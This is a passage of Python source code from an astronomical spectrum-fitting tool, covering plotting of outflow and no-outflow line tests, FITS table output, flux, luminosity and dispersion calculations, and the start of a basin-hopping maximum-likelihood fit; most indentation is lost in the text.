ax_low = np.min([ax1.get_ylim()[0],ax2.get_ylim()[0]])
ax_upp = np.max([ax1.get_ylim()[1], ax2.get_ylim()[1]])
if np.isfinite(sigma_resid):
ax_upp += 3.0 * sigma_resid
minimum = [np.nanmin(comp_dict_outflow[comp][np.where(np.isfinite(comp_dict_outflow[comp]))[0]]) for comp in comp_dict_outflow
			   if np.where(np.isfinite(comp_dict_outflow[comp]))[0].size > 0]
if len(minimum) > 0:
minimum = np.nanmin(minimum)
else:
minimum = 0.0
ax1.set_ylim(np.nanmin([0.0, minimum]), ax_upp)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax2.set_ylim(ax_low,ax_upp)
ax2.set_xlim(np.min(lam_gal),np.max(lam_gal))
# Axes labels
ax2.set_yticklabels(np.round(np.array(ax2.get_yticks()/3.0)))
ax2.set_ylabel(r'$\Delta f_\lambda$',fontsize=12)
ax2.set_xlabel(r'Wavelength, $\lambda\;(\mathrm{\AA})$',fontsize=12)
handles, labels = ax1.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
ax1.legend(by_label.values(), by_label.keys(),loc='upper right',fontsize=8)
ax2.legend(loc='upper right',fontsize=8)
# Emission line annotations
# Gather up emission line center wavelengths and labels (if available, removing any duplicates)
line_labels = []
for line in line_list_outflows:
if "label" in line_list_outflows[line]:
line_labels.append([line,line_list_outflows[line]["label"]])
line_labels = set(map(tuple, line_labels))
for label in line_labels:
center = line_list_outflows[label[0]]["center"]
if (line_list_outflows[label[0]]["voff"]=="free"):
voff = p[label[0]+"_VOFF"]
elif (line_list_outflows[label[0]]["voff"]!="free"):
voff = ne.evaluate(line_list_outflows[label[0]]["voff"],local_dict = p).item()
xloc = calc_new_center(center,voff)
yloc = np.max([comp_dict_outflow["DATA"][find_nearest(lam_gal,xloc)[1]],comp_dict_outflow["MODEL"][find_nearest(lam_gal,xloc)[1]]])
ax1.annotate(label[1], xy=(xloc, yloc), xycoords='data',
xytext=(xloc, yloc), textcoords='data',
horizontalalignment='center', verticalalignment='bottom',
color='xkcd:white',fontsize=6,
)
	# No-line (no-outflow) model (ax3,ax4)
# Put params in dictionary
p = dict(zip(param_names_no_outflows,params_no_outflows))
for key in comp_dict_no_outflow:
if (key=='DATA'):
ax3.plot(comp_dict_no_outflow['WAVE'],comp_dict_no_outflow['DATA'],linewidth=0.5,color='white',label='Data',zorder=0)
elif (key=='MODEL'):
ax3.plot(lam_gal,comp_dict_no_outflow[key], color='xkcd:bright red', linewidth=1.0, label='Model', zorder=15)
elif (key=='HOST_GALAXY'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['HOST_GALAXY'], color='xkcd:bright green', linewidth=0.5, linestyle='-', label='Host/Stellar')
elif (key=='POWER'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['POWER'], color='xkcd:red' , linewidth=0.5, linestyle='--', label='AGN Cont.')
elif (key=='PPOLY'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['PPOLY'], color='xkcd:magenta' , linewidth=0.5, linestyle='-', label='%s-order Poly.' % (poly_label("ppoly")))
elif (key=='APOLY'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['APOLY'], color='xkcd:bright purple' , linewidth=0.5, linestyle='-', label='%s-order Add. Poly.' % (poly_label("apoly")))
elif (key=='MPOLY'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['MPOLY'], color='xkcd:lavender' , linewidth=0.5, linestyle='-', label='%s-order Mult. Poly.' % (poly_label("mpoly")))
elif (key in ['NA_OPT_FEII_TEMPLATE','BR_OPT_FEII_TEMPLATE']):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['NA_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='Narrow FeII')
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['BR_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='Broad FeII')
elif (key in ['F_OPT_FEII_TEMPLATE','S_OPT_FEII_TEMPLATE','G_OPT_FEII_TEMPLATE','Z_OPT_FEII_TEMPLATE']):
if key=='F_OPT_FEII_TEMPLATE':
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['F_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='F-transition FeII')
elif key=='S_OPT_FEII_TEMPLATE':
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['S_OPT_FEII_TEMPLATE'], color='xkcd:mustard', linewidth=0.5, linestyle='-' , label='S-transition FeII')
elif key=='G_OPT_FEII_TEMPLATE':
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['G_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='G-transition FeII')
elif key=='Z_OPT_FEII_TEMPLATE':
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['Z_OPT_FEII_TEMPLATE'], color='xkcd:rust', linewidth=0.5, linestyle='-' , label='Z-transition FeII')
elif (key=='UV_IRON_TEMPLATE'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['UV_IRON_TEMPLATE'], color='xkcd:bright purple', linewidth=0.5, linestyle='-' , label='UV Iron' )
elif (key=='BALMER_CONT'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['BALMER_CONT'], color='xkcd:bright green', linewidth=0.5, linestyle='--' , label='Balmer Continuum' )
# Plot emission lines by cross-referencing comp_dict with line_list
if (key in line_list_no_outflows):
if (line_list_no_outflows[key]["line_type"]=="na"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:cerulean', linewidth=0.5, linestyle='-', label='Narrow/Core Comp.')
if (line_list_no_outflows[key]["line_type"]=="br"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:bright teal', linewidth=0.5, linestyle='-', label='Broad Comp.')
if (line_list_no_outflows[key]["line_type"]=="out"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:bright pink', linewidth=0.5, linestyle='-', label='Outflow Comp.')
if (line_list_no_outflows[key]["line_type"]=="abs"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:pastel red', linewidth=0.5, linestyle='-', label='Absorption Comp.')
if (line_list_no_outflows[key]["line_type"]=="user"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:electric lime', linewidth=0.5, linestyle='-', label='Other')
ax3.axvline(min_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax3.axvline(max_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax4.axvline(min_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax4.axvline(max_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax3.set_xticklabels([])
ax3.set_xlim(np.min(lam_gal)-10,np.max(lam_gal)+10)
# ax3.set_ylim(-0.5*np.median(comp_dict['MODEL']),np.max([comp_dict['DATA'],comp_dict['MODEL']]))
ax3.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=10)
# Residuals
sigma_resid = np.nanstd(comp_dict_no_outflow['DATA']-comp_dict_no_outflow['MODEL'])
sigma_noise = np.median(comp_dict_no_outflow['NOISE'])
ax4.plot(lam_gal,(comp_dict_no_outflow['NOISE']*3.0),linewidth=0.5,color="xkcd:bright orange",label='$\sigma_{\mathrm{noise}}=%0.4f$' % (sigma_noise))
ax4.plot(lam_gal,(comp_dict_no_outflow['RESID']*3.0),linewidth=0.5,color="white",label='$\sigma_{\mathrm{resid}}=%0.4f$' % (sigma_resid))
ax4.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
# Axes limits
ax_low = np.min([ax3.get_ylim()[0],ax4.get_ylim()[0]])
ax_upp = np.max([ax3.get_ylim()[1], ax4.get_ylim()[1]])
if np.isfinite(sigma_resid):
ax_upp += 3.0 * sigma_resid
minimum = [np.nanmin(comp_dict_no_outflow[comp][np.where(np.isfinite(comp_dict_no_outflow[comp]))[0]]) for comp in comp_dict_no_outflow
			   if np.where(np.isfinite(comp_dict_no_outflow[comp]))[0].size > 0]
if len(minimum) > 0:
minimum = np.nanmin(minimum)
else:
minimum = 0.0
ax3.set_ylim(np.nanmin([0.0, minimum]), ax_upp)
ax3.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax4.set_ylim(ax_low,ax_upp)
ax4.set_xlim(np.min(lam_gal),np.max(lam_gal))
# Axes labels
ax4.set_yticklabels(np.array(ax4.get_yticks()/3.0,dtype=int))
ax4.set_ylabel(r'$\Delta f_\lambda$',fontsize=12)
ax4.set_xlabel(r'Wavelength, $\lambda\;(\mathrm{\AA})$',fontsize=12)
handles, labels = ax3.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
ax3.legend(by_label.values(), by_label.keys(),loc='upper right',fontsize=8)
ax4.legend(loc='upper right',fontsize=8)
# Emission line annotations
# Gather up emission line center wavelengths and labels (if available, removing any duplicates)
line_labels = []
for line in line_list_no_outflows:
if "label" in line_list_no_outflows[line]:
line_labels.append([line,line_list_no_outflows[line]["label"]])
line_labels = set(map(tuple, line_labels))
for label in line_labels:
center = line_list_no_outflows[label[0]]["center"]
if (line_list_no_outflows[label[0]]["voff"]=="free"):
voff = p[label[0]+"_VOFF"]
elif (line_list_no_outflows[label[0]]["voff"]!="free"):
voff = ne.evaluate(line_list_no_outflows[label[0]]["voff"],local_dict = p).item()
xloc = calc_new_center(center,voff)
yloc = np.max([comp_dict_no_outflow["DATA"][find_nearest(lam_gal,xloc)[1]],comp_dict_no_outflow["MODEL"][find_nearest(lam_gal,xloc)[1]]])
ax3.annotate(label[1], xy=(xloc, yloc), xycoords='data',
xytext=(xloc, yloc), textcoords='data',
horizontalalignment='center', verticalalignment='bottom',
color='xkcd:white',fontsize=6,
)
# Title
ax1.set_title(run_dir.parent.name,fontsize=12)
#
fig.tight_layout()
	plt.savefig(run_dir.joinpath('line_test.pdf'),format='pdf')
plt.close()
#
return
#### Write Line Test Results #####################################################
def write_line_test_results(result_dict_outflows,
comp_dict_outflows,
result_dict_no_outflows,
comp_dict_no_outflows,
fit_mask,
run_dir,
binnum=None,
spaxelx=None,
spaxely=None):
"""
	Writes the results of line (outflow) testing. Creates FITS tables for
	the best-fit parameters and best-fit components for both the line
	and no-line test results.
"""
#
#
# Write Outflow model FITS tables
# Extract elements from dictionaries
par_names = []
par_best = []
sig = []
for key in result_dict_outflows:
par_names.append(key)
par_best.append(result_dict_outflows[key]['med'])
sig.append(result_dict_outflows[key]['std'])
if 0:
for i in range(0,len(par_names),1):
print(par_names[i],par_best[i],sig[i])
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit' , format='E' , array=par_best)
col3 = fits.Column(name='sigma' , format='E' , array=sig)
cols = fits.ColDefs([col1,col2,col3])
hdu = fits.BinTableHDU.from_columns(cols)
hdr = fits.PrimaryHDU()
hdul = fits.HDUList([hdr, hdu])
if binnum is not None:
hdr.header.append(('BINNUM', binnum, 'bin index of the spaxel (Voronoi)'), end=True)
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdul.append(hdu2)
hdul.writeto(run_dir.joinpath('log/line_par_table.fits'),overwrite=True)
# Write best-fit components to FITS file
cols = []
# Construct a column for each parameter and chain
for key in comp_dict_outflows:
cols.append(fits.Column(name=key, format='E', array=comp_dict_outflows[key]))
# Add fit mask to cols
cols.append(fits.Column(name="MASK", format='E', array=fit_mask))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdr = fits.PrimaryHDU()
hdul = fits.HDUList([hdr, hdu])
if binnum is not None:
hdr.header.append(('BINNUM', binnum, 'bin index of the spaxel (Voronoi)'), end=True)
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdul.append(hdu2)
hdul.writeto(run_dir.joinpath('log/line_best_model_components.fits'),overwrite=True)
#
#
# Write No-outflow model FITS tables
par_names = []
par_best = []
sig = []
for key in result_dict_no_outflows:
par_names.append(key)
par_best.append(result_dict_no_outflows[key]['med'])
sig.append(result_dict_no_outflows[key]['std'])
if 0:
for i in range(0,len(par_names),1):
print(par_names[i],par_best[i],sig[i])
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit' , format='E' , array=par_best)
col3 = fits.Column(name='sigma' , format='E' , array=sig)
cols = fits.ColDefs([col1,col2,col3])
hdu = fits.BinTableHDU.from_columns(cols)
hdr = fits.PrimaryHDU()
hdul = fits.HDUList([hdr, hdu])
if binnum is not None:
hdr.header.append(('BINNUM', binnum, 'bin index of the spaxel (Voronoi)'), end=True)
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdul.append(hdu2)
hdul.writeto(run_dir.joinpath('log/no_line_par_table.fits'),overwrite=True)
# Write best-fit components to FITS file
cols = []
# Construct a column for each parameter and chain
for key in comp_dict_no_outflows:
cols.append(fits.Column(name=key, format='E', array=comp_dict_no_outflows[key]))
# Add fit mask to cols
cols.append(fits.Column(name="MASK", format='E', array=fit_mask))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'no_line_best_model_components.fits'),overwrite=True)
#
return
####################################################################################
def calc_max_like_flux(comp_dict, lam_gal):
"""
Calculates component fluxes for maximum likelihood fitting.
	Adds fluxes to the existing parameter dictionary "pdict" in max_likelihood().
"""
flux_dict = {}
for key in comp_dict:
if key not in ['DATA', 'WAVE', 'MODEL', 'NOISE', 'RESID', "HOST_GALAXY", "POWER", "BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
flux = np.log10(1.e-17*(simps(comp_dict[key],lam_gal)))
# Add to flux_dict
flux_dict[key+"_FLUX"] = flux
return flux_dict
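	# Note: fluxes are stored as log10 of the integrated line flux in erg s^-1 cm^-2, i.e.
	# log10( 1e-17 * simps(f_lambda, lambda) ), where 1e-17 is the flux-density normalization of the
	# input spectrum (erg s^-1 cm^-2 A^-1).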
####################################################################################
def calc_max_like_lum(flux_dict, z, H0=70.0,Om0=0.30):
"""
Calculates component luminosities for maximum likelihood fitting.
	Adds luminosities to the existing parameter dictionary "pdict" in max_likelihood().
"""
# Compute luminosity distance (in cm) using FlatLambdaCDM cosmology
cosmo = FlatLambdaCDM(H0, Om0)
d_mpc = cosmo.luminosity_distance(z).value
d_cm = d_mpc * 3.086E+24 # 1 Mpc = 3.086e+24 cm
lum_dict = {}
for key in flux_dict:
flux = 10**flux_dict[key] #* 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 )) #/ 1.0E+42
# Add to lum_dict
lum_dict[key[:-4]+'LUM']= lum
return lum_dict
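	# Note: luminosities are stored as log10(L) in erg s^-1, computed from the standard relation
	# L = 4*pi*d_L^2*F, where d_L is the luminosity distance (in cm) for the assumed flat
	# Lambda-CDM cosmology defined by (H0, Om0).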
####################################################################################
def calc_max_like_eqwidth(comp_dict, line_list, lam_gal, noise, velscale):
"""
	Calculates component equivalent widths for maximum likelihood fitting.
	Adds equivalent widths to the existing parameter dictionary "pdict" in max_likelihood().
"""
# Create a single continuum component based on what was fit
cont = np.zeros(len(lam_gal))
for key in comp_dict:
if key in ["POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
cont+=comp_dict[key]
# Get all spectral components, not including data, model, resid, and noise
spec_comps= [i for i in comp_dict if i not in ["DATA","MODEL","WAVE","RESID","NOISE","POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]]
# Get keys of any lines that were fit for which we will compute eq. widths for
lines = [i for i in line_list]
if (spec_comps) and (lines) and (np.sum(cont)>0):
eqwidth_dict = {}
for c in spec_comps:
if 1:#c in lines: # component is a line
# print(c,comp_dict[c],cont)
eqwidth = simps(comp_dict[c]/cont,lam_gal)
#
if ~np.isfinite(eqwidth):
eqwidth=0.0
# Add to eqwidth_dict
eqwidth_dict[c+"_EW"] = eqwidth
else:
eqwidth_dict = None
return eqwidth_dict
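	# Note: equivalent widths are computed as EW = simps( F_line(lambda)/F_cont(lambda), lambda ) in
	# Angstroms, where F_cont is the sum of all fitted continuum components (power law, host galaxy,
	# Balmer continuum, and any polynomial components).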
##################################################################################
def calc_max_like_cont_lum(clum, comp_dict, lam_gal, z, H0=70.0, Om0=0.30):
"""
Calculate monochromatic continuum luminosities
"""
clum_dict = {}
total_cont = np.zeros(len(lam_gal))
agn_cont = np.zeros(len(lam_gal))
host_cont = np.zeros(len(lam_gal))
for key in comp_dict:
if key in ["POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
total_cont+=comp_dict[key]
if key in ["POWER","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
agn_cont+=comp_dict[key]
if key in ["HOST_GALAXY", "PPOLY", "APOLY", "MPOLY"]:
host_cont+=comp_dict[key]
#
# Calculate luminosity distance
cosmo = FlatLambdaCDM(H0, Om0)
d_mpc = cosmo.luminosity_distance(z).value
d_cm = d_mpc * 3.086E+24 # 1 Mpc = 3.086e+24 cm
# Interpolation function for the continuum
interp_tot = interp1d(lam_gal,total_cont,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
interp_agn = interp1d(lam_gal,agn_cont ,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
interp_host = interp1d(lam_gal,host_cont ,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
for c in clum:
# Total luminosities
if (c=="L_CONT_TOT_1350"):
flux = interp_tot(1350.0) * 1.e-17# * 1350.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
clum_dict["L_CONT_TOT_1350"] = lum
if (c=="L_CONT_TOT_3000"):
flux = interp_tot(3000.0) * 1.e-17 #* 3000.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
clum_dict["L_CONT_TOT_3000"] = lum
if (c=="L_CONT_TOT_5100"):
flux = interp_tot(5100.0) * 1.e-17 #* 5100.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
clum_dict["L_CONT_TOT_5100"] = lum
# AGN luminosities
if (c=="L_CONT_AGN_1350"):
flux = interp_agn(1350.0) * 1.e-17# * 1350.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
clum_dict["L_CONT_AGN_1350"] = lum
if (c=="L_CONT_AGN_3000"):
flux = interp_agn(3000.0) * 1.e-17 #* 3000.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
clum_dict["L_CONT_AGN_3000"] = lum
if (c=="L_CONT_AGN_5100"):
flux = interp_agn(5100.0) * 1.e-17 #* 5100.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
clum_dict["L_CONT_AGN_5100"] = lum
# Host luminosities
if (c=="L_CONT_HOST_1350"):
flux = interp_host(1350.0) * 1.e-17# * 1350.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
clum_dict["L_CONT_HOST_1350"] = lum
if (c=="L_CONT_HOST_3000"):
flux = interp_host(3000.0) * 1.e-17 #* 3000.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
clum_dict["L_CONT_HOST_3000"] = lum
if (c=="L_CONT_HOST_5100"):
flux = interp_host(5100.0) * 1.e-17 #* 5100.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
clum_dict["L_CONT_HOST_5100"] = lum
# Host and AGN fractions
if (c=="HOST_FRAC_4000"):
clum_dict["HOST_FRAC_4000"] = interp_host(4000.0)/interp_tot(4000.0)
if (c=="AGN_FRAC_4000"):
clum_dict["AGN_FRAC_4000"] = interp_agn(4000.0)/interp_tot(4000.0)
if (c=="HOST_FRAC_7000"):
clum_dict["HOST_FRAC_7000"] = interp_host(7000.0)/interp_tot(7000.0)
if (c=="AGN_FRAC_7000"):
clum_dict["AGN_FRAC_7000"] = interp_agn(7000.0)/interp_tot(7000.0)
return clum_dict
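	# Note: the monochromatic continuum luminosities are stored as log10(lambda*L_lambda) in erg s^-1,
	# evaluated at rest-frame 1350, 3000, and 5100 A by linear interpolation of the total, AGN, and
	# host continuum models; HOST_FRAC and AGN_FRAC are simple flux ratios at 4000 and 7000 A.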
##################################################################################
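# Note: remove_stray_lines() clips a model line profile so that only the contiguous positive segment
# containing the profile maximum is kept; detached positive "stray" pixels on either side of the peak
# (and all negative values) are zeroed out before the profile moments are computed.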
def remove_stray_lines(line_profile):
line_profile[line_profile<0] = 0
max_idx = np.where(line_profile==np.max(line_profile))[0][0]
# print(max_idx)
#
left_bad = [i for i in np.arange(max_idx,-1,-1) if line_profile[i]>0]
# print(left_bad)
left_bad_idx = [max_idx-np.where(np.abs(np.diff(left_bad))>1)[0]-1][0]
# print(left_bad_idx)
if len(left_bad_idx)>0:
l0 = left_bad_idx[0]
line_profile[range(0,l0+1,1)]= 0
#
right_bad = [i for i in np.arange(max_idx,len(line_profile),1) if line_profile[i]>0]
right_bad_idx = [max_idx+np.where(np.abs(np.diff(right_bad))>1)[0]+1][0]
if len(right_bad_idx)>0:
r0 = right_bad_idx[0]
line_profile[range(r0,len(line_profile),1)]= 0
# print(right_bad_idx)
#
return line_profile
def calc_max_like_dispersions(comp_dict, line_list, combined_line_list, lam_gal, noise, velscale):
# Get keys of any lines that were fit for which we will compute eq. widths for
lines = [i for i in line_list]
#
disp_dict = {}
fwhm_dict = {}
vint_dict = {}
#
interp_ftn = interp1d(lam_gal,np.arange(len(lam_gal))*velscale,bounds_error=False)
# Loop through lines
for line in lines:
# Calculate velocity scale centered on line
vel = np.arange(len(lam_gal))*velscale - interp_ftn(line_list[line]["center"])
full_profile = comp_dict[line]
# Remove stray lines
full_profile = remove_stray_lines(full_profile)
#
# Normalized line profile
norm_profile = full_profile/np.sum(full_profile)
# Calculate integrated velocity in pixels units
v_int = simps(vel*norm_profile,vel)/simps(norm_profile,vel)
# Calculate integrated dispersion and correct for instrumental dispersion
d_int = np.sqrt(simps(vel**2*norm_profile,vel)/simps(norm_profile,vel) - (v_int**2))
d_int = np.sqrt(d_int**2 - (line_list[line]["fwhm_res_kms"]/2.3548)**2)
#
if ~np.isfinite(d_int): d_int = 0.0
if ~np.isfinite(v_int): v_int = 0.0
disp_dict[line+"_DISP"] = d_int
vint_dict[line+"_VINT"] = v_int
if line in combined_line_list:
comb_fwhm = combined_fwhm(lam_gal,comp_dict[line],line_list[line]["fwhm_res_kms"],velscale)
fwhm_dict[line+"_FWHM"] = comb_fwhm
#
return disp_dict, fwhm_dict, vint_dict
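	# Note: the integrated velocity and dispersion above are the first and second flux-weighted moments
	# of the normalized model line profile on the velocity grid, v_int = int(v*P(v) dv)/int(P(v) dv) and
	# d_int = sqrt( int(v^2*P(v) dv)/int(P(v) dv) - v_int^2 ), with the instrumental dispersion
	# (fwhm_res_kms/2.3548) subtracted in quadrature.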
#### Maximum Likelihood Fitting ##################################################
def max_likelihood(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat="RCHI2",
output_model=False,
test_outflows=False,
n_basinhop=5,
max_like_niter=10,
verbose=True):
"""
This function performs an initial maximum likelihood estimation to acquire robust
	initial parameters. It also performs the Monte Carlo bootstrapping used both for
	line/outflow testing and for determining the final initial parameters for emcee.
"""
param_names = [key for key in param_dict ]
params = [param_dict[key]['init'] for key in param_dict ]
bounds = [param_dict[key]['plim'] for key in param_dict ]
lb, ub = zip(*bounds)
param_bounds = op.Bounds(lb,ub,keep_feasible=True)
# Generate constraints
# cons = []
# def lambda_gen(con):
# con = copy.deepcopy(con)
# return lambda p: p[param_names.index(con[0])]-p[param_names.index(con[1])]
# cons = [{"type":"ineq","fun": lambda_gen(con)} for con in soft_cons]
def lambda_gen(con):
return lambda p: ne.evaluate(con[0],local_dict = {param_names[i]:p[i] for i in range(len(p))}).item()-ne.evaluate(con[1],local_dict = {param_names[i]:p[i] for i in range(len(p))}).item()
cons = [{"type":"ineq","fun": lambda_gen(copy.deepcopy(con))} for con in soft_cons]
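	# Each soft constraint is a pair of numexpr expressions (expr_A, expr_B); it is converted into a
	# scipy inequality constraint of the form expr_A - expr_B >= 0, evaluated on the current parameter
	# vector at every iteration of the minimizer.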
#
# Perform maximum likelihood estimation for initial guesses of MCMC fit
if verbose:
print('\n Performing max. likelihood fitting.')
print('\n Using Basin-hopping algorithm to estimate parameters. niter_success = %d' % (n_basinhop))
# Start a timer
start_time = time.time()
	# Negative log-likelihood (we maximize the likelihood by minimizing its negative)
nll = lambda *args: -lnlike(*args)
# Perform global optimization using basin-hopping algorithm (superior to minimize(), but slower)
# We will use minimize() for the monte carlo bootstrap iterations.
result = op.basinhopping(func = nll,
x0 = params,
# T = 0.0,
stepsize=1.0,
niter = 100, # Max # of iterations before stopping
minimizer_kwargs = {'args':(
param_names,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model),
'method':'SLSQP', 'bounds':param_bounds, 'constraints':cons, "options":{"disp":False}},
disp=verbose,
niter_success=n_basinhop, # Max # of successive search iterations
)
#
# Get elapsed time
elap_time = (time.time() - start_time)
par_best = result['x']
fit_type = 'init'
output_model = True
comp_dict = fit_model(par_best,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# if fit_stat=="RCHI2":
# return {p:result['x'][i] for i,p in enumerate(param_names)},comp_dict
#### Maximum Likelihood Bootstrapping #################################################################
# Construct random normally-distributed noise
# How we do the monte carlo bootstrapping (i.e., the proper way):
# (1) The 1-sigma uncertainty (spectral "noise") from inverse variance of the SDSS spectra is
# the pixel-to-pixel variation in the spectrum when rows of pixels are added to form the final 1-d spectrum.
# This is always an underestimate of the true noise in the spectrum.
# (2) The residual noise from a fit, taken to be the median absolute deviation of the residuals from a fit. This
# is always greater than the "noise" from (1), but closer to the actual value of the noise across the fitting
# region.
# We add (1) and (2) in quadrature to simulate the noise at /every/ pixel in the fitting region.
# Note: the SDSS noise is likely underestimated, but this is the best we can do.
mcnoise = np.array(noise)
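	# Note: in this implementation only the input 1-sigma spectral noise is used to perturb the spectrum
	# at each bootstrap iteration (mcgal = Normal(galaxy, mcnoise)); the residual-noise term described
	# above is not added in quadrature here.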
	# Storage dictionaries for all calculated parameters at each iteration
mcpars = {k:np.empty(max_like_niter+1) for k in param_names}
# flux_dict
flux_names = [key+"_FLUX" for key in comp_dict if key not in ["DATA","WAVE","MODEL","NOISE","RESID","POWER","HOST_GALAXY","BALMER_CONT"]]
mcflux = {k:np.empty(max_like_niter+1) for k in flux_names}
# lum dict
lum_names = [key+"_LUM" for key in comp_dict if key not in ["DATA","WAVE","MODEL","NOISE","RESID","POWER","HOST_GALAXY","BALMER_CONT"]]
mclum = {k:np.empty(max_like_niter+1) for k in lum_names}
# eqwidth dict
# line_names = [key+"_EW" for key in {**line_list, **combined_line_list}]
line_names = [key+"_EW" for key in comp_dict if key not in ["DATA","WAVE","MODEL","NOISE","RESID","POWER","HOST_GALAXY","BALMER_CONT"]]
mceqw = {k:np.empty(max_like_niter+1) for k in line_names}
# integrated dispersion & velocity dicts
line_names = [key+"_DISP" for key in {**line_list, **combined_line_list}]
